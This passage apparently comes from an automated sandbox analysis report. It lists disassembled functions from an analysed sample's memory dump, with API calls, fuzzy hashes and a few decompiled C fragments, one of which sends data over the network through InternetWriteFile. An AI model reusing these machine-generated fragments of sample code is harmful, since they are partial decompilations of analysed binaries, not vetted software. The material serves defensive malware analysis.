                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2373586757-0
                                                                                                                        • Opcode ID: c96cb54d69b2e72c33b7ccef88fc343d0c67f6c2bcea48f5501e4b2da4db33ec
                                                                                                                        • Instruction ID: 5b0d46b2eaf9db0c8e34daec1bb3c68aedab5a910da052f1160804802a4cabbb
                                                                                                                        • Opcode Fuzzy Hash: c96cb54d69b2e72c33b7ccef88fc343d0c67f6c2bcea48f5501e4b2da4db33ec
                                                                                                                        • Instruction Fuzzy Hash: E8F0493190021AABDB14CF84CD15AEE7B75FF84724F40861EF915BB290DB709E06CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B902E, Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,?,?,00000000,?,?,004B94BF,?,?), ref: 004B903D
                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 004B9052
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderFromListLocationPathSpecial
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4082711253-0
                                                                                                                        • Opcode ID: 1a07ec47ec511dc4f57abc01f306aab521682879e19b57807c77db00ec5aa062
                                                                                                                        • Instruction ID: f1e0d808538a051708fd8d0fe8338a81a008b9702c1e33bbc0f793a8b6581c58
                                                                                                                        • Opcode Fuzzy Hash: 1a07ec47ec511dc4f57abc01f306aab521682879e19b57807c77db00ec5aa062
                                                                                                                        • Instruction Fuzzy Hash: E3E01A75204208FF9F126FA5DC86CEA7BBDEF057517104066B60292221E73ACE45BA69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005428AD, Relevance: 3.0, APIs: 2, Instructions: 16threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __freeptd.LIBCMT ref: 005428D5
                                                                                                                        • ExitThread.KERNEL32 ref: 005428DF
                                                                                                                          • Part of subcall function 0054B6F0: __FindPESection.LIBCMT ref: 0054B749
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFindSectionThread__freeptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3875298718-0
                                                                                                                        • Opcode ID: bf38d6aade445fd683fc23250041e958ab305ed77acaeb1038a3e994e673a00d
                                                                                                                        • Instruction ID: f91b78106646ab00efe3f5564bb3c9c902be208e6bd20ba3e857690153520d16
                                                                                                                        • Opcode Fuzzy Hash: bf38d6aade445fd683fc23250041e958ab305ed77acaeb1038a3e994e673a00d
                                                                                                                        • Instruction Fuzzy Hash: CED09E301047129AF7347B759D0E7DD7FA4BF8074AF544424F544940B1DBB89D84CD25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004DDFDE, Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004DDFE5
                                                                                                                          • Part of subcall function 004DDEF8: __EH_prolog3.LIBCMT ref: 004DDEFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3355343447-0
                                                                                                                        • Opcode ID: 60160e52a95a2bde7b0c48627ae63641b27596a99d48080995d60c0ce4beb6c4
                                                                                                                        • Instruction ID: 6a24a258222711af561e351bfa2156e0ab07941e5c0c7c21904ef7ec1e558bfd
                                                                                                                        • Opcode Fuzzy Hash: 60160e52a95a2bde7b0c48627ae63641b27596a99d48080995d60c0ce4beb6c4
                                                                                                                        • Instruction Fuzzy Hash: 38719030D0528CEBCF01EBE9C965AEDBB75AF11308F1440AEE0416B296DB791F09D766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005075E8, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 005075EF
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 005072B5: __EH_prolog3.LIBCMT ref: 005072BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1185523453-0
                                                                                                                        • Opcode ID: 989a8c9b4409ff34137ae2057257d2359292377de6860364279afef05c8754dd
                                                                                                                        • Instruction ID: dce4a58076b1f79dcc68fbb24687161c045465a5dbd90a94269580c4af74cf0e
                                                                                                                        • Opcode Fuzzy Hash: 989a8c9b4409ff34137ae2057257d2359292377de6860364279afef05c8754dd
                                                                                                                        • Instruction Fuzzy Hash: 8341B170D04249ABCF00EBB9C856BDEBFB4BF19310F04415DE552A72D2DB74AA04CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004DDEF8, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004DDEFF
                                                                                                                          • Part of subcall function 004D8737: __EH_prolog3.LIBCMT ref: 004D873E
                                                                                                                          • Part of subcall function 004D8737: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000008,004DDF46,?), ref: 004D8775
                                                                                                                          • Part of subcall function 004F8985: __EH_prolog3_GS.LIBCMT ref: 004F898C
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$H_prolog3_QueryValuechar_traits
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2246805832-0
                                                                                                                        • Opcode ID: 7c0f16742046c0cf82e0f452d1248b96d913d472505ce95f28ba892708e95cf5
                                                                                                                        • Instruction ID: 6ed7e1eb13f2deb5c84d3cef608bd2f19f6efdf6871414d86584e0a2f72d8771
                                                                                                                        • Opcode Fuzzy Hash: 7c0f16742046c0cf82e0f452d1248b96d913d472505ce95f28ba892708e95cf5
                                                                                                                        • Instruction Fuzzy Hash: BC21A070C0514DAADB01EBE8C962BEEBBB89F11308F1040AEE041772C2DB795F09C766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3354E0, Relevance: 1.5, APIs: 1, Instructions: 44filenetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F3354E0(void* _a4, intOrPtr _a8, intOrPtr* _a12) {
				long _v4;
				intOrPtr _v20;
				intOrPtr _t10;
				int _t13;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t23;
				void* _t25;

				_t10 =  *_a12;
				_t25 = 0;
				if(_t10 == 0) {
					return 0;
				} else {
					_t18 = _a4;
					_t23 = _a8;
					while(1) {
						_v4 = 0;
						_t13 = InternetWriteFile(_t18, _t25 + _t23, _t10 - _t25,  &_v4); // executed
						if(_t13 == 0) {
							break;
						}
						_t15 = _v20;
						if(_t15 != 0) {
							_t25 = _t25 + _t15;
							_t10 =  *_v4;
							if(_t25 < _t10) {
								continue;
							}
						}
						break;
					}
					return _t25;
				}
			}











                                                                                                                        0x6f3354e5
                                                                                                                        0x6f3354e8
                                                                                                                        0x6f3354ec
                                                                                                                        0x6f33553b
                                                                                                                        0x6f3354ee
                                                                                                                        0x6f3354ef
                                                                                                                        0x6f3354fb
                                                                                                                        0x6f335500
                                                                                                                        0x6f33550d
                                                                                                                        0x6f335515
                                                                                                                        0x6f335519
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33551b
                                                                                                                        0x6f335521
                                                                                                                        0x6f335523
                                                                                                                        0x6f335529
                                                                                                                        0x6f33552d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33552d
                                                                                                                        0x00000000
                                                                                                                        0x6f335521
                                                                                                                        0x6f335536
                                                                                                                        0x6f335536

                                                                                                                        APIs
                                                                                                                        • InternetWriteFile.WININET(6F3358C4,?,3B0CC483,6F3358C4), ref: 6F335515
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInternetWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1927131202-0
                                                                                                                        • Opcode ID: 943ee48de6f153da1b988902e941c48ae71a6fb5d333489c02d96e219fd986db
                                                                                                                        • Instruction ID: 5ae66350dfbba4b373986f9eb9c8fa638bf3241e5b4c9c9800912d5239c76599
                                                                                                                        • Opcode Fuzzy Hash: 943ee48de6f153da1b988902e941c48ae71a6fb5d333489c02d96e219fd986db
                                                                                                                        • Instruction Fuzzy Hash: 4FF044737043669B9300CE5DE880957F3D9BB89691F51051EF555C3240D720F9048B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0059F279, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: 29052e571a89c4622a3cd17796fb8b731cabe71a794ecd488a8efe6f77e494b9
                                                                                                                        • Instruction ID: cbf1da70172896e474e1e7c4493e07a6ea64c9e75dea0ee304069738da0211f6
                                                                                                                        • Opcode Fuzzy Hash: 29052e571a89c4622a3cd17796fb8b731cabe71a794ecd488a8efe6f77e494b9
                                                                                                                        • Instruction Fuzzy Hash: 89015AB4A01255ABCB10EBA4EC8AA6E7B39FF84B10B104659F511EB2D1C7389901CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00502EAD, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: dcb672cc15d1c1b9812791a3214e2e64f888795ca5a554862b43985ab5216695
                                                                                                                        • Instruction ID: a6511b989250e932586d4f137ffa7679b783a469f906909701c65ddca75831b9
                                                                                                                        • Opcode Fuzzy Hash: dcb672cc15d1c1b9812791a3214e2e64f888795ca5a554862b43985ab5216695
                                                                                                                        • Instruction Fuzzy Hash: B8F08C71644206AEEF44AFB5890EB7E3FA8BF58321F500569BA15DA1D1EB74D8009B24
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BEB0F, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BEB16
                                                                                                                          • Part of subcall function 0040CD04: __EH_prolog3.LIBCMT ref: 0040CD0B
                                                                                                                          • Part of subcall function 00405B1B: __EH_prolog3.LIBCMT ref: 00405B25
                                                                                                                          • Part of subcall function 00405B1B: __CxxThrowException@8.LIBCMT ref: 00405B56
                                                                                                                          • Part of subcall function 00405B1B: __EH_prolog3_catch.LIBCMT ref: 00405B63
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 24280941-0
                                                                                                                        • Opcode ID: a8cb32522bd01ea6b73e3970c2884a8fbaa61a23be2959a159b2e61c3bfa88be
                                                                                                                        • Instruction ID: af61eaa94382c69b3300d68eadf7dc43faa917ba5aca0a2887ff9092679f13c1
                                                                                                                        • Opcode Fuzzy Hash: a8cb32522bd01ea6b73e3970c2884a8fbaa61a23be2959a159b2e61c3bfa88be
                                                                                                                        • Instruction Fuzzy Hash: 83018B31800249EADF10EFA8C80ABCC7FB0AF00318F144269F455672D2CBB99A448BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B4C0, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B4C0() {
				void* _t4;
				void* _t13;

				E6F33B460();
				_t13 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
				if(_t13 != 0) {
					E6F33B4B0();
					return 1;
				} else {
					_t4 = HeapCreate(0, 0, 0); // executed
					"ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t4;
					if(_t4 == 0) {
						E6F33B4B0();
						return 9;
					} else {
						E6F33A540(_t4);
						E6F33B4B0();
